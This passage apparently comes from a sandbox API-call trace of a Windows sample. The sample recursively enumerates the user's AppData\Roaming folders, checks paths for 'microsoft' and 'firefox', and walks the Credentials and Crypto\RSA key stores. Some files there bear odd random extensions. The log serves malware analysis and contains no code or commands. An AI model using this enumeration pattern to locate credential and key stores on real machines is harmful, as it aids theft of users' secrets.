onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0057.601] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0057.601] GetNamedSecurityInfoW () returned 0x0 [0057.601] GetAce (in: pAcl=0xb0f604, dwAceIndex=0x0, pAce=0x9ad938 | out: pAce=0x9ad938*=0xb0f60c) returned 1 [0057.601] LocalFree (hMem=0xb0f5f0) returned 0x0 [0057.602] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0057.602] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0057.602] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0057.602] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb071d8 [0057.602] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.602] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.602] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.602] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.602] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0057.602] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 1 [0057.603] GetNamedSecurityInfoW () returned 0x0 [0057.603] GetAce (in: pAcl=0xb1060c, dwAceIndex=0x0, pAce=0x9ad4a0 | out: pAce=0x9ad4a0*=0xb10614) returned 1 [0057.604] LocalFree (hMem=0xb105f8) returned 0x0 [0057.604] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="microsoft") returned 0x0 [0057.604] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="firefox") returned 0x0 [0057.604] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0057.604] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb07498 [0057.604] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0057.604] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0057.604] FindClose (in: hFindFile=0xb07498 | out: hFindFile=0xb07498) returned 1 [0057.605] Sleep (dwMilliseconds=0x0) [0057.608] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.608] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0057.608] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.608] Sleep (dwMilliseconds=0x0) [0057.611] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0057.611] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.611] Sleep (dwMilliseconds=0x0) [0057.612] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.613] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0057.613] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned 0 [0057.613] GetNamedSecurityInfoW () returned 0x0 [0057.613] LocalFree (hMem=0xb0e5e8) returned 0x0 [0057.613] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0057.614] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0057.614] Sleep (dwMilliseconds=0x0) [0057.617] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.617] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.617] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned 0 [0057.618] GetNamedSecurityInfoW () returned 0x0 [0057.618] LocalFree (hMem=0xb0e5e8) returned 0x0 [0057.618] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="microsoft") returned 0x0 [0057.618] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="firefox") returned 0x0 [0057.618] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.618] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0057.619] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.619] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.619] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.619] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 0 [0057.619] GetNamedSecurityInfoW () returned 0x0 [0057.620] LocalFree (hMem=0xb0f5f0) returned 0x0 [0057.620] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="microsoft") returned 0x0 [0057.620] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="firefox") returned 0x0 [0057.620] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.620] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb071d8 [0057.620] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.620] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.620] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.620] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 1 [0057.621] GetNamedSecurityInfoW () returned 0x0 [0057.621] LocalFree (hMem=0xb105f8) returned 0x0 [0057.621] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="microsoft") returned 0x0 [0057.621] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="firefox") returned 0x0 [0057.621] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.621] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb07218 [0057.621] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0057.621] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0057.621] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.622] Sleep (dwMilliseconds=0x0) [0057.624] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0057.624] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.624] Sleep (dwMilliseconds=0x0) [0057.657] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0057.657] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.657] Sleep (dwMilliseconds=0x0) [0057.663] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0 [0057.663] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.663] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0057.663] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0xb070d8 [0057.664] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.664] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.664] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0057.664] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0057.664] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07158 [0057.664] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.665] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.665] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0057.665] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0057.666] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07418 [0057.666] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.666] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.666] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", pszSpec="*") returned 1 [0057.666] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.666] PathMatchSpecW (pszFile="Desktop (create shortcut).igb", pszSpec="*") returned 1 [0057.666] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.666] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0057.666] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0057.666] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0057.667] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.667] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.667] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.667] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.667] PathMatchSpecW (pszFile="Windows PowerShell (x86).ezu", pszSpec="*") returned 1 [0057.667] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.667] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.667] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.667] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.668] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.668] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0057.668] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*" [0057.668] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07158 [0057.668] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.668] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.668] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials" [0057.668] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0057.668] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.668] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.669] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.669] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.669] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.669] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto" [0057.669] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0057.669] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.669] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.669] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.669] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0057.669] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0057.670] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.670] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.670] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.670] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.670] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.670] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.671] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.671] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.671] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.671] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.671] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.671] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.672] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.673] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.673] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.673] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.673] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.673] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.673] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0057.673] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0057.673] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.674] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.674] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.674] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0057.674] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0057.674] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.674] FindNextFileW (in: 